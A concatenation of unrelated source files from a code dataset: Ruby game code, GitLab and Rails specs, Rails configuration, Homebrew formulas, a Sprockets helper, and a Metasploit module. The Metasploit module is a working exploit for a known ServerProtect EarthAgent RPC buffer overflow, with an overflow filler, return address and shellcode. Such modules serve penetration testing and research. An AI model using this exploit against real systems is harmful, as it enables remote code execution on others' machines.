"7" => [0, 2],
"8" => [1, 2],
"9" => [2, 2]
}
mapping[human_move]
end
def game_over_message
return "#{current_player.name} won!" if board.game_over? == :winner
return "The game ended in a tie" if board.game_over? == :draw
end
def play
puts "#{current_player.name} has randomly been selected as the first player"
while true
board.formatted_grid
puts ""
puts solicit_move
x, y = get_move
board.set_cell(x, y, current_player.color)
if board.game_over?
puts game_over_message
board.formatted_grid
return
else
switch_players
end
end
end
end
end | 23.142857 | 80 | 0.581619 |
38baa81995767ac947238e82f1fbe6ee8877b657 | 3,067 | require 'spec_helper'
describe Banzai::Filter::GollumTagsFilter, lib: true do
include FilterSpecHelper
let(:project) { create(:project) }
let(:user) { double }
let(:project_wiki) { ProjectWiki.new(project, user) }
describe 'validation' do
it 'ensure that a :project_wiki key exists in context' do
expect { filter("See [[images/image.jpg]]", {}) }.to raise_error ArgumentError, "Missing context keys for Banzai::Filter::GollumTagsFilter: :project_wiki"
end
end
context 'linking internal images' do
it 'creates img tag if image exists' do
file = Gollum::File.new(project_wiki.wiki)
expect(file).to receive(:path).and_return('images/image.jpg')
expect(project_wiki).to receive(:find_file).with('images/image.jpg').and_return(file)
tag = '[[images/image.jpg]]'
doc = filter("See #{tag}", project_wiki: project_wiki)
expect(doc.at_css('img')['src']).to eq "#{project_wiki.wiki_base_path}/images/image.jpg"
end
it 'does not creates img tag if image does not exist' do
expect(project_wiki).to receive(:find_file).with('images/image.jpg').and_return(nil)
tag = '[[images/image.jpg]]'
doc = filter("See #{tag}", project_wiki: project_wiki)
expect(doc.css('img').size).to eq 0
end
end
context 'linking external images' do
it 'creates img tag for valid URL' do
tag = '[[http://example.com/image.jpg]]'
doc = filter("See #{tag}", project_wiki: project_wiki)
expect(doc.at_css('img')['src']).to eq "http://example.com/image.jpg"
end
it 'does not creates img tag for invalid URL' do
tag = '[[http://example.com/image.pdf]]'
doc = filter("See #{tag}", project_wiki: project_wiki)
expect(doc.css('img').size).to eq 0
end
end
context 'linking external resources' do
it "the created link's text will be equal to the resource's text" do
tag = '[[http://example.com]]'
doc = filter("See #{tag}", project_wiki: project_wiki)
expect(doc.at_css('a').text).to eq 'http://example.com'
expect(doc.at_css('a')['href']).to eq 'http://example.com'
end
it "the created link's text will be link-text" do
tag = '[[link-text|http://example.com/pdfs/gollum.pdf]]'
doc = filter("See #{tag}", project_wiki: project_wiki)
expect(doc.at_css('a').text).to eq 'link-text'
expect(doc.at_css('a')['href']).to eq 'http://example.com/pdfs/gollum.pdf'
end
end
context 'linking internal resources' do
it "the created link's text will be equal to the resource's text" do
tag = '[[wiki-slug]]'
doc = filter("See #{tag}", project_wiki: project_wiki)
expect(doc.at_css('a').text).to eq 'wiki-slug'
expect(doc.at_css('a')['href']).to eq 'wiki-slug'
end
it "the created link's text will be link-text" do
tag = '[[link-text|wiki-slug]]'
doc = filter("See #{tag}", project_wiki: project_wiki)
expect(doc.at_css('a').text).to eq 'link-text'
expect(doc.at_css('a')['href']).to eq 'wiki-slug'
end
end
end
| 34.077778 | 160 | 0.6433 |
61c201a82fabb68877aac96e95a1ff1ff20bb37a | 4,014 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# Code is not reloaded between requests.
config.cache_classes = true
# Eager load code on boot. This eager loads most of Rails and
# your application in memory, allowing both threaded web servers
# and those relying on copy on write to perform better.
# Rake tasks automatically ignore this option for performance.
config.eager_load = true
# Full error reports are disabled and caching is turned on.
config.consider_all_requests_local = false
config.action_controller.perform_caching = true
# Enable Rack::Cache to put a simple HTTP cache in front of your application
# Add `rack-cache` to your Gemfile before enabling this.
# For large-scale production use, consider using a caching reverse proxy like
# NGINX, varnish or squid.
# config.action_dispatch.rack_cache = true
# Disable serving static files from the `/public` folder by default since
# Apache or NGINX already handles this.
config.serve_static_files = ENV['RAILS_SERVE_STATIC_FILES'].present?
# Compress JavaScripts and CSS.
config.assets.js_compressor = :uglifier
# config.assets.css_compressor = :sass
# Do not fallback to assets pipeline if a precompiled asset is missed.
config.assets.compile = false
# Asset digests allow you to set far-future HTTP expiration dates on all assets,
# yet still be able to expire them through the digest params.
config.assets.digest = true
# `config.assets.precompile` and `config.assets.version` have moved to config/initializers/assets.rb
# Specifies the header that your server uses for sending files.
# config.action_dispatch.x_sendfile_header = 'X-Sendfile' # for Apache
# config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for NGINX
# Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
# config.force_ssl = true
# Use the lowest log level to ensure availability of diagnostic information
# when problems arise.
config.log_level = :debug
# Prepend all log lines with the following tags.
# config.log_tags = [ :subdomain, :uuid ]
# Use a different logger for distributed setups.
# config.logger = ActiveSupport::TaggedLogging.new(SyslogLogger.new)
# Use a different cache store in production.
# config.cache_store = :mem_cache_store
# Enable serving of images, stylesheets, and JavaScripts from an asset server.
# config.action_controller.asset_host = 'http://assets.example.com'
# Ignore bad email addresses and do not raise email delivery errors.
# Set this to true and configure the email server for immediate delivery to raise delivery errors.
# config.action_mailer.raise_delivery_errors = false
# Enable locale fallbacks for I18n (makes lookups for any locale fall back to
# the I18n.default_locale when a translation cannot be found).
config.i18n.fallbacks = true
# Send deprecation notices to registered listeners.
config.active_support.deprecation = :notify
# Use default logging formatter so that PID and timestamp are not suppressed.
config.log_formatter = ::Logger::Formatter.new
# Do not dump schema after migrations.
config.active_record.dump_schema_after_migration = false
# Mail Setting
config.action_mailer.default_url_options = { host: ENV['ROOT_PATH'] }
config.action_mailer.delivery_method = :smtp
config.action_mailer.raise_delivery_errors = false
config.action_mailer.smtp_settings = {
address: Settings.smtp.address,
port: Settings.smtp.port,
enable_starttls_auto: Settings.smtp.enable_starttls_auto,
user_name: Settings.smtp.user_name,
password: Settings.smtp.password,
authentication: Settings.smtp.authentication
}
config.middleware.use ExceptionNotification::Rack,
email: {
email_prefix: "[glass]",
sender_address: %{"Notifier" <[email protected]>},
exception_recipients: %w{[email protected]}
}
end
| 39.742574 | 102 | 0.758844 |
793c76480e58731ba084e98c2d2486680eff5479 | 1,027 |
lib = File.expand_path("../lib", __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require "xspec/version"
Gem::Specification.new do |spec|
spec.name = "simple-xspec-wrapper"
spec.version = XSpec::VERSION
spec.authors = ["Matt Patterson"]
spec.email = ["[email protected]"]
spec.summary = %q{A simple wrapper to run a suite of XSpec tests independently}
spec.homepage = "https://github.com/fidothe/simple-xspec-wrapper"
spec.license = "MIT"
spec.platform = 'java'
spec.files = `git ls-files -z`.split("\x0").reject do |f|
f.match(%r{^(test|spec|features|\.ruby-version)/})
end
spec.bindir = "exe"
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ["lib"]
spec.add_dependency "saxon-xslt", "~> 0.8"
spec.add_development_dependency "bundler", "~> 1.16"
spec.add_development_dependency "rake", "~> 10.0"
spec.add_development_dependency "rspec", "~> 3.0"
end
| 35.413793 | 87 | 0.640701 |
4a300dd28888dc79c39d88a0e5df89b3ebf9f8eb | 632 | class Role < ApplicationRecord
has_and_belongs_to_many :users, :join_table => :users_roles
belongs_to :resource,
:polymorphic => true,
:optional => true
validates :resource_type,
:inclusion => { :in => Rolify.resource_types },
:allow_nil => true
scopify
has_and_belongs_to_many :users, :join_table => :users_roles
has_many :permissions, as: :permissible
belongs_to :resource,
:polymorphic => true,
:optional => true
validates :resource_type,
:inclusion => { :in => Rolify.resource_types },
:allow_nil => true
scopify
has_paper_trail
end
| 19.75 | 59 | 0.648734 |
f884cf1689ededa22052ed4ab5d55eee438361d1 | 1,304 | require "language/node"
class Babel < Formula
desc "Compiler for writing next generation JavaScript"
homepage "https://babeljs.io/"
url "https://registry.npmjs.org/babel-cli/-/babel-cli-6.24.1.tgz"
sha256 "d69a00bdb4f35184cda1f5bfe8075cd4d569600b8e61d864d1f08e360367933b"
bottle do
rebuild 1
sha256 "fa63837b3f1351ef2d0307ab556e40bbd91c1bc383c6d4ada3a072471cb01b40" => :high_sierra
sha256 "102dda22f4541c686da92112bf3b7c91da7ace61e04633d19a9874ee6c3d8935" => :sierra
sha256 "7dde27b4e0d9901fa2b2f3051fbe5b11baa3635e7bfac15ae4a0690e0270f067" => :el_capitan
sha256 "7aefce36cb45b334a7585aab124cc6521d23b202126ed57b1b5c4eff394b6988" => :x86_64_linux
end
devel do
url "https://registry.npmjs.org/babel-cli/-/babel-cli-7.0.0-alpha.12.tgz"
sha256 "a81e2421486ca48d3961c4ab1fada8acd3bb3583ccfb28822cbb0b16a2635144"
end
depends_on "node"
def install
system "npm", "install", *Language::Node.std_npm_install_args(libexec)
bin.install_symlink Dir["#{libexec}/bin/*"]
end
test do
(testpath/"script.js").write <<-EOS.undent
[1,2,3].map(n => n + 1);
EOS
system bin/"babel", "script.js", "--out-file", "script-compiled.js"
assert_predicate testpath/"script-compiled.js", :exist?, "script-compiled.js was not generated"
end
end
| 34.315789 | 99 | 0.751534 |
f7e306b0032b9a59d0d1962200d4aae84de0d5c4 | 859 | require "json"
package = JSON.parse(File.read(File.join(__dir__, "package.json")))
Pod::Spec.new do |s|
s.name = "react-native-svg-viewer"
s.version = package["version"]
s.summary = package["description"]
s.description = <<-DESC
react-native-svg-viewer
DESC
s.homepage = "https://github.com/welldsagl/react-native-svg-viewer"
s.license = "MIT"
# s.license = { :type => "MIT", :file => "FILE_LICENSE" }
s.authors = { "Gabriele Prestifilippo" => "[email protected]" }
s.platforms = { :ios => "9.0", :tvos => "10.0" }
s.source = { :git => "https://github.com/welldsagl/react-native-svg-viewer.git", :tag => "#{s.version}" }
s.source_files = "ios/**/*.{h,m,swift}"
s.requires_arc = true
s.dependency "React"
# s.dependency "..."
end
| 31.814815 | 113 | 0.57858 |
6afffef640de3fc62fb3d731c3c9ea84e644b674 | 1,317 | require 'bundler/setup'
require 'yaml'
require 'rspec'
require 'rspec/its'
require 'rspec/collection_matchers'
require 'yaml'
require 'active_support'
require 'active-orient'
read_yml = -> (key) do
YAML::load_file( File.expand_path('../spec.yml',__FILE__))[key]
end
OPT ||= {}
[:oetl,:orientdb, :admin].each{|kw| OPT[kw] = read_yml[kw] }
if OPT.empty?
puts "spec/spec.yml not found or misconfigurated"
puts "expected: "
puts <<EOS
:orientdb:
:server: localhost
:port: 2480
:database: some_database
:admin:
:user: hctw
:pass: hc
EOS
Kernel.exit
else
puts "OPT: #{OPT.inspect}"
end
RSpec.configure do |config|
config.mock_with :rspec
config.color = true
# ermöglicht die Einschränkung der zu testenden Specs
# durch >>it "irgendwas", :focus => true do <<
config.filter_run :focus => true
config.run_all_when_everything_filtered = true
config.order = 'defined' # "random"
end
RSpec.shared_context 'private', private: true do
before :all do
described_class.class_eval do
@original_private_instance_methods = private_instance_methods
public *@original_private_instance_methods
end
end
after :all do
described_class.class_eval do
private *@original_private_instance_methods
end
end
end
| 20.904762 | 72 | 0.688686 |
b9b58700ee425c1bf64973ba9c631544ec756c5b | 1,046 | require_relative 'boot'
require "rails"
# Pick the frameworks you want:
require "active_model/railtie"
require "active_job/railtie"
# require "active_record/railtie"
require "action_controller/railtie"
require "action_mailer/railtie"
require "action_view/railtie"
require "action_cable/engine"
# require "sprockets/railtie"
require "rails/test_unit/railtie"
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(*Rails.groups)
module ApiExample
class Application < Rails::Application
# Settings in config/environments/* take precedence over those specified here.
# Application configuration should go into files in config/initializers
# -- all .rb files in that directory are automatically loaded.
# Only loads a smaller set of middleware suitable for API only apps.
# Middleware like session, flash, cookies can be added back manually.
# Skip views, helpers and assets when generating a new resource.
config.api_only = true
end
end
| 32.6875 | 82 | 0.771511 |
217f7175d16f34259f87ca558dc242bd4146a31d | 270 | use Rack::Static,
:urls => ["/images", "/js", "/css"],
:root => "public"
run lambda { |env|
[
200,
{
'Content-Type' => 'text/html',
'Cache-Control' => 'public, max-age=86400'
},
File.open('public/index.html', File::RDONLY)
]
}
| 16.875 | 49 | 0.496296 |
4ab700d97b1c12b7851ae39cdf09e490be91e383 | 988 | # frozen_string_literal: true
# == Schema Information
#
# Table name: microposts
#
# id :bigint not null, primary key
# content :text
# created_at :datetime not null
# updated_at :datetime not null
# user_id :bigint
#
# Indexes
#
# index_microposts_on_user_id (user_id)
# index_microposts_on_user_id_and_created_at (user_id,created_at)
#
# Foreign Keys
#
# fk_rails_... (user_id => users.id)
#
require 'rails_helper'
RSpec.describe Micropost, type: :model do
describe 'validations' do
subject(:micropost) { create(:micropost) }
it { is_expected.to be_valid }
it { is_expected.to accept_content_types('image/png', 'image/jpeg', 'image/jpg', 'image/gif').for(:image) }
it { is_expected.to validate_presence_of(:content) }
it { is_expected.to validate_length_of(:content).is_at_most(140) }
it { is_expected.to validate_presence_of(:user_id) }
it { is_expected.to belong_to(:user) }
end
end
| 27.444444 | 111 | 0.676113 |
e298fc0cdbf507fb83dd04ddd7c0ea8ae009a4b9 | 645 | class UserMailer < ActionMailer::Base
helper :days
default from: Rails.configuration.noreply_email
def introduction(user, token)
@user = user
@token = token
mail to: @user.email
end
def closure_notification(user, token)
@user = user
@token = token
mail to: @user.email
end
def feedback_not_received(user, token)
@user = user
@token = token
mail to: @user.email
end
def feedback_not_given(review, token)
@review = review
@token = token
mail to: @review.author_email
end
def closing_soon(user, token)
@user = user
@token = token
mail to: @user.email
end
end
| 18.428571 | 49 | 0.657364 |
6af335c747c380096a0c31ccb9d7588754741771 | 333 | class APIStats < APIMain
def bounces
data(URLS_STATS[:bounces])
end
def cycle
data(URLS_STATS[:cycle])
end
def history
data(URLS_STATS[:history])
end
def spam
data(URLS_STATS[:spam])
end
def summary
data(URLS_STATS[:summary])
end
def unsubscribe
data(URLS_STATS[:unsubs])
end
end
| 12.807692 | 30 | 0.660661 |
62ed52ccb1bd8c7162eb1f325763a0c190ca3764 | 1,270 | module Mazes
# Internal: Standard interface for all Space-manipulating Algorithms that create
# mazes. Algorithm subclasses need only define a single method which, when
# called, will execute the algorithm on a Space.
class Algorithm
# Internal: Executes an algorithm on a Space of Cells.
#
# space - A Space of Cells over which to execute.
# origin - A Cell from which to start the Algorithm. Defaults to random choice.
# Iterative Algorithms do not use origin; random Algorithms do. However, all
# Algorithm subclasses must include it in their signature, even if it is going
# to be discarded, in order to fit Ruby's expectations.
#
# The Space is modified in-place, and so the return value need not be captured
# in order to proceed. The space is returned from this function to permit method
# chaining for convenience.
#
# Returns the modified Space.
#
# Raises a NotImplemented exception.
def self.act_on space:, origin: space.sample
raise NotImplemented "#{self.class} has not implemented an action"
space
end
# Public: Strip the scoping identifiers from the Algorithm name, because frankly
# Mazes::Algorithms:: is just a waste of space.
#
# Returns a String naming the Algorithm.
def self.to_s
super.to_s.gsub(/.*::/, '')
end
end
end
| 34.324324 | 80 | 0.752756 |
18964eda9ccd8fa3eb7a24f81c6ad11e24f48671 | 1,069 | class RubyBuild < Formula
desc "Install various Ruby versions and implementations"
homepage "https://github.com/rbenv/ruby-build"
url "https://github.com/rbenv/ruby-build/archive/v20210119.tar.gz"
sha256 "5c49a0b46a471f8f6a176a56637ded1a09c7a583fa02451ae8a93ad5ced772c1"
license "MIT"
head "https://github.com/rbenv/ruby-build.git"
bottle :unneeded
depends_on "autoconf"
depends_on "pkg-config"
depends_on "readline"
def install
ENV["PREFIX"] = prefix
system "./install.sh"
end
def caveats
<<~EOS
ruby-build installs a non-Homebrew OpenSSL for each Ruby version installed and these are never upgraded.
To link Rubies to Homebrew's OpenSSL 1.1 (which is upgraded) add the following
to your #{shell_profile}:
export RUBY_CONFIGURE_OPTS="--with-openssl-dir=$(brew --prefix [email protected])"
Note: this may interfere with building old versions of Ruby (e.g <2.4) that use
OpenSSL <1.1.
EOS
end
test do
assert_match "2.0.0", shell_output("#{bin}/ruby-build --definitions")
end
end
| 28.891892 | 110 | 0.710945 |
ab4665317c83e23b4d3999de3b139f270f6f5818 | 4,039 | module Sinatra
module Sprockets
class AssetPaths
attr_reader :config
class AssetNotPrecompiledError < StandardError; end
def initialize(config)
@config = config
end
def asset_for(source, ext)
source = source.to_s
return nil if is_uri?(source)
source = rewrite_extension(source, nil, ext)
config.environment[source]
rescue ::Sprockets::FileOutsidePaths
nil
end
def digest_for(logical_path)
if config.digest_assets? && config.digests && (digest = config.digests[logical_path])
digest
else
if config.compile_assets?
if config.digest_assets? && asset = config.environment[logical_path]
asset.digest_path
else
logical_path
end
else
raise AssetNotPrecompiledError.new("#{logical_path} isn't precompiled")
end
end
end
def compute_public_path(source, dir, options = {})
source = source.to_s
unless is_uri?(source)
source = rewrite_extension(source, dir, options[:ext]) if options[:ext]
source = rewrite_asset_path(source, dir, options)
source = rewrite_relative_url_root(source, config.relative_url_root)
source = rewrite_host_and_protocol(source, options[:protocol])
end
source
end
def is_uri?(path)
path =~ %r{^[-a-z]+://|^cid:|^//}
end
def rewrite_host_and_protocol(source, protocol = nil)
host = compute_asset_host(source)
if host && !is_uri?(host)
if (protocol || default_protocol) == :request && !has_request?
host = nil
else
host = "#{compute_protocol(protocol)}#{host}"
end
end
host ? "#{host}#{source}" : source
end
def rewrite_relative_url_root(source, relative_url_root)
relative_url_root && !source.starts_with?("#{relative_url_root}/") ? "#{relative_url_root}#{source}" : source
end
def rewrite_asset_path(source, dir, options = {})
if source[0] == ?/
source
else
source = digest_for(source) unless options[:digest] == false
source = File.join(dir, source)
source = "/#{source}" unless source =~ /^\//
source
end
end
def rewrite_extension(source, dir, ext)
if ext && File.extname(source).empty?
"#{source}.#{ext}"
else
source
end
end
def compute_asset_host(source)
if host = config.host
if host.respond_to?(:call)
args = [source]
arity = arity_of(host)
if arity > 1 && request.nil?
invalid_asset_host!("Remove the second argument to your asset_host Proc if you do not need the request.")
end
args << current_request if (arity > 1 || arity < 0) && has_request?
host.call(*args)
else
(host =~ /%d/) ? host % (Zlib.crc32(source) % 4) : host
end
end
end
def default_protocol
config.default_protocol || (request.nil?? :relative : :request)
end
def compute_protocol(protocol)
protocol ||= default_protocol
case protocol
when :request
if request.nil?
invalid_asset_host!("The protocol requested was :request. Consider using :relative instead.")
end
request.protocol
when :relative
"//"
else
"#{protocol}://"
end
end
def arity_of(callable)
callable.respond_to?(:arity) ? callable.arity : callable.method(:call).arity
end
def invalid_asset_host!(help_message)
raise ActionController::RoutingError, "This asset host cannot be computed without a request in scope. #{help_message}"
end
end
end
end | 30.832061 | 126 | 0.562763 |
ac58666e85da1722115e75a415f883240a611f56 | 319 | Given(/^the following YouTube channels exist for the site "(.*?)":$/) do |site_name, table|
site = Affiliate.find_by_name(site_name)
table.hashes.each do |hash|
profile = YoutubeProfile.where(hash).first_or_initialize
profile.save!
site.youtube_profiles << profile
end
site.enable_video_govbox!
end
| 31.9 | 91 | 0.733542 |
e84af04dbc8bbaaee84d824d91c0723453dc000c | 6,375 | require "rails_helper"
describe "Event", type: :feature do
describe "index page" do
it "should link to the show page when an event title is clicked" do
event = FactoryGirl.create :event
visit events_path
click_link event.name
expect(page).to have_current_path(event_path(event))
end
end
describe "create page" do
['Camp', 'Workshop'].each do |kind|
it "should allow picking the #{kind} kind camp" do
visit new_event_path
fill_in "Maximale Teilnehmerzahl", :with => 25
choose(kind)
click_button I18n.t('.events.form.publish')
expect(page).to have_text(kind)
end
end
it "should not allow dates in the past" do
visit new_event_path
fill_in "event[date_ranges_attributes][][start_date]", with: Date.yesterday.prev_day
fill_in "event[date_ranges_attributes][][end_date]", with: Date.yesterday
click_button I18n.t('.events.form.publish')
expect(page).to have_text('Anfangs-Datum darf nicht in der Vergangenheit liegen')
end
it "should warn about unreasonably long time spans" do
visit new_event_path
fill_in 'Maximale Teilnehmerzahl', :with => 25
fill_in "event_application_deadline", :with => Date.current
fill_in "event[date_ranges_attributes][][start_date]", with: Date.current
fill_in "event[date_ranges_attributes][][end_date]", with: Date.current.next_year(3)
click_button I18n.t('.events.form.publish')
expect(page).to have_text('End-Datum liegt ungewöhnlich weit vom Start-Datum entfernt.')
end
it "should not allow an end date before a start date" do
visit new_event_path
fill_in "event[date_ranges_attributes][][start_date]", with: Date.current
fill_in "event[date_ranges_attributes][][end_date]", with: Date.current.prev_day(2)
click_button I18n.t('.events.form.publish')
expect(page).to have_text('End-Datum kann nicht vor Start-Datum liegen')
end
it "should allow entering multiple time spans", js: true do
visit new_event_path
first_from = Date.tomorrow.next_day(1)
first_to = Date.tomorrow.next_day(2)
second_from = Date.tomorrow.next_day(6)
second_to = Date.tomorrow.next_day(8)
fill_in 'Maximale Teilnehmerzahl', :with => 25
fill_in "event[date_ranges_attributes][][start_date]", with: I18n.l(first_from)
fill_in "event[date_ranges_attributes][][end_date]", with: I18n.l(first_to)
click_link "Zeitspanne hinzufügen"
within page.find('#event-date-pickers').all('div')[1] do
fill_in "event[date_ranges_attributes][][start_date]", with: I18n.l(second_from)
fill_in "event[date_ranges_attributes][][end_date]", with: I18n.l(second_to)
end
fill_in "event_application_deadline", :with => I18n.l(Date.tomorrow)
click_button I18n.t('.events.form.publish')
expect(page).to have_text (DateRange.new start_date: first_from, end_date: first_to)
expect(page).to have_text (DateRange.new start_date: second_from, end_date: second_to)
end
it "should save application deadline" do
visit new_event_path
deadline = Date.tomorrow
fill_in "event_name", :with => "Event Name"
fill_in "event_max_participants", :with => 12
fill_in "event_application_deadline", :with => I18n.l(deadline)
fill_in "event[date_ranges_attributes][][start_date]", :with => Date.current.next_day(2)
fill_in "event[date_ranges_attributes][][end_date]", :with => Date.current.next_day(3)
click_button I18n.t('.events.form.publish')
expect(page).to have_text("Bewerbungsschluss: " + I18n.l(deadline))
end
it "should not allow an application deadline after the start of the event" do
visit new_event_path
fill_in "event_max_participants", :with => 12
fill_in "event_application_deadline", :with => Date.tomorrow
fill_in "event[date_ranges_attributes][][start_date]", :with => Date.current
click_button I18n.t('.events.form.publish')
expect(page).to have_text("Bewerbungsschluss muss vor Beginn der Veranstaltung liegen")
end
end
describe "show page" do
it "should display the event kind" do
%i[camp workshop].each do |kind|
event = FactoryGirl.create(:event, kind: kind)
visit event_path(event)
expect(page).to have_text(kind.to_s.humanize)
end
end
it "should display a single day date range as a single date" do
event = FactoryGirl.create(:event, :single_day)
visit event_path(event)
expect(page).to have_text(event.date_ranges.first.start_date)
expect(page).to_not have_text(" bis " + I18n.l(event.date_ranges.first.end_date))
end
it "should display all date ranges" do
event = FactoryGirl.create(:event, :with_two_date_ranges)
visit event_path(event.id)
expect(page).to have_text(event.date_ranges.first)
expect(page).to have_text(event.date_ranges.second)
end
it "should show that the application deadline is on midnight of the picked date" do
event = FactoryGirl.create(:event)
visit event_path(event.id)
expect(page).to have_text(I18n.l(event.application_deadline) + " Mitternacht")
end
end
describe "edit page" do
it "should preselect the event kind" do
event = FactoryGirl.create(:event, kind: :camp)
visit edit_event_path(event)
expect(find_field('Camp')[:checked]).to_not be_nil
end
it "should display all existing date ranges" do
event = FactoryGirl.create(:event, :with_two_date_ranges)
visit edit_event_path(event.id)
page.assert_selector('[name="event[date_ranges_attributes][][start_date]"]', count: 2)
end
it "should save edits to the date ranges" do
event = FactoryGirl.create(:event, :with_two_date_ranges)
date_start = Date.current.next_year
date_end = Date.tomorrow.next_year
visit edit_event_path(event.id)
within page.find('#event-date-pickers').first('div') do
fill_in "event[date_ranges_attributes][][start_date]", with: date_start
fill_in "event[date_ranges_attributes][][end_date]", with: date_end
end
click_button I18n.t('.events.form.update')
expect(page).to have_text (DateRange.new start_date: date_start, end_date: date_end)
end
end
end
| 38.636364 | 94 | 0.693804 |
6a7fb3dcbdec7eacb065bda67a5f390d27f01d72 | 654 | class MobilityStringTranslation < ApplicationRecord
belongs_to :translatable, polymorphic: true
belongs_to :created_by, class_name: "User", optional: true
validates :locale, presence: true
validates :key, presence: true
validates :value, presence: true
validates :translatable_id, uniqueness: { scope: [:translatable_type, :locale, :key] }
scope :translatable, ->(record) { where(translatable_id: record.id).where(translatable_type: record.class.to_s) }
scope :locale, ->(locale) { where("locale ILIKE ?", locale) }
scope :key, ->(key) { where("key ILIKE ?", key) }
scope :value, ->(value) { where("value ILIKE ?", value) }
end
| 38.470588 | 115 | 0.70948 |
b952e1db109ec627be9ec02d97e60ed5e716aca1 | 1,090 | require "rack"
require "spec_helper"
require "raptor"
describe Raptor::Route do
let(:injector) { Raptor::Injector.new }
it "errors if redirect target doesn't exist"
it "can render text" do
app = Raptor::App.new(Object) {}
route = Raptor::BuildsRoutes.new(app).root(:text => "the text")
req = request("GET", "/posts")
response = route.respond_to_request(injector, req)
response.body.join.strip.should == "the text"
end
class OnlyIDOfFive
def match?(id)
id == '5'
end
end
it "injects route params into the presenter" do
route = Raptor::Route.new(:show, '/posts/:id', [OnlyIDOfFive.new], stub, stub, stub)
req = request("GET", "/posts/5")
route.match?(injector, req).should be_true
end
it "routes to nested routes"
it "stores templates in templates directory, not views"
it "allows overriding of the presenter class"
it "doesn't require .html.erb on template names"
it "includes type definitions in routes so they can be casted before injection"
end
class MatchingRequirement
def self.match?
true
end
end
| 25.348837 | 88 | 0.685321 |
019cce88c6ce3973271b8ee71527d2f61d3cb018 | 2,369 | ##
# $Id: trendmicro_serverprotect_earthagent.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::DCERPC
def initialize(info = {})
super(update_info(info,
'Name' => 'Trend Micro ServerProtect 5.58 EarthAgent.EXE Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060
EarthAgent.EXE. By sending a specially crafted RPC request, an attacker could overflow the
buffer and execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9179 $',
'References' =>
[
['CVE', '2007-2508'],
['OSVDB', '35789'],
['BID', '23866'],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 800,
'BadChars' => "\x00",
'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Trend Micro ServerProtect 5.58 Build 1060', { 'Ret' => 0x605e3c2f } ], # pop esi; pop ebx; ret / agentclient.dll
],
'DefaultTarget' => 0,
'DisclosureDate' => 'May 7 2007'))
register_options( [ Opt::RPORT(3628) ], self.class )
end
def exploit
connect
handle = dcerpc_handle('25288888-bd5b-11d1-9d53-0080c83a5c2c', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
print_status("Binding to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
filler = rand_text_english(680) + Rex::Arch::X86.jmp_short(6)
filler << make_nops(2) + [target.ret].pack('V') + payload.encoded
len = filler.length
sploit = NDR.long(0x001f0014) + NDR.long(len) + filler + NDR.long(len)
print_status("Trying target #{target.name}...")
begin
dcerpc_call(0, sploit)
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
end
handler
disconnect
end
end | 28.202381 | 121 | 0.604897 |
ffd52dc857f47ccffaffbb69aed2f1295e734b07 | 1,156 | require 'spec_helper'
module Atlas
module Parser
module TextToHash
describe MultiLineBlock do
context 'with a correctly formatted block' do
let(:block) do
MultiLineBlock.new([
Line.new("~ demand ="),
Line.new(" SUM("),
Line.new(" 1,"),
Line.new(" 2"),
Line.new(" )")
])
end
describe '#key' do
it 'parses correctly' do
expect(block.key).to eql :demand
end
end
describe '#value' do
it 'parses correctly' do
expect(block.value).to eql "SUM(\n 1,\n 2\n)"
end
end
end
context 'when the value starts on the same line as the key' do
let(:block) do
MultiLineBlock.new([
Line.new("~ demand = SUM("),
Line.new(" 1"),
Line.new(" )")
])
end
it 'raises an error' do
expect { block.key }.to raise_error(Atlas::ParserError)
end
end
end
end
end
end
| 24.083333 | 70 | 0.446367 |
e21b8c80b738e403f4c0af7c82aca74d057ad20a | 542 | class CreateItemsQuestions < ActiveRecord::Migration
def self.up
create_table :items_questions do |t|
t.integer :item_id, :null => false
t.integer :question_id, :null => false
t.integer :position, :default => 1400, :null => false
t.integer :wins, :default => 0, :null => false
t.integer :ratings, :default => 0, :null => false
t.timestamps
end
add_index :items_questions, :item_id
add_index :items_questions, :question_id
end
def self.down
drop_table :items_questions
end
end
| 27.1 | 59 | 0.662362 |
bb6daae872f1111610e73acf6d6e094a0eeec56e | 856 | require 'spec_helper'
describe 'rundeck::config::securityroles', type: :define do
on_supported_os.each do |os, os_facts|
context "on #{os}" do
let(:facts) do
os_facts.merge(
serialnumber: 0,
rundeck_version: ''
)
end
describe 'with array parameters' do
let(:title) { 'source one' }
let(:params) do
{
'package_ensure' => 'latest',
'security_roles_array_enabled' => true
}
end
security_roles_array = %w[devops roots]
security_roles_array.each do |roles|
it "augeas with param: #{roles}" do
contain_augeas('rundeck/web.xml/security-role/role-name') .with_changes(["set web-app/security-role/role-name/#text '#{roles}'"])
end
end
end
end
end
end
| 25.939394 | 141 | 0.556075 |
ab8df64abebc20da43e9231ad5a4e4b32aaef5aa | 15,870 | class PhpAT72 < Formula
desc "General-purpose scripting language"
homepage "https://www.php.net/"
# Should only be updated if the new version is announced on the homepage, https://www.php.net/
url "https://www.php.net/distributions/php-7.2.31.tar.xz"
mirror "https://fossies.org/linux/www/php-7.2.31.tar.xz"
sha256 "8beaa634bb878a96af9bc8643811ea46973f5f41ad2bfb6ab4cfd290e5a39806"
revision 1
bottle do
sha256 "88e7932c8403e83c4b7ce1a5a5a704e2b45d0618f79ab568b0e92dc795b896d4" => :catalina
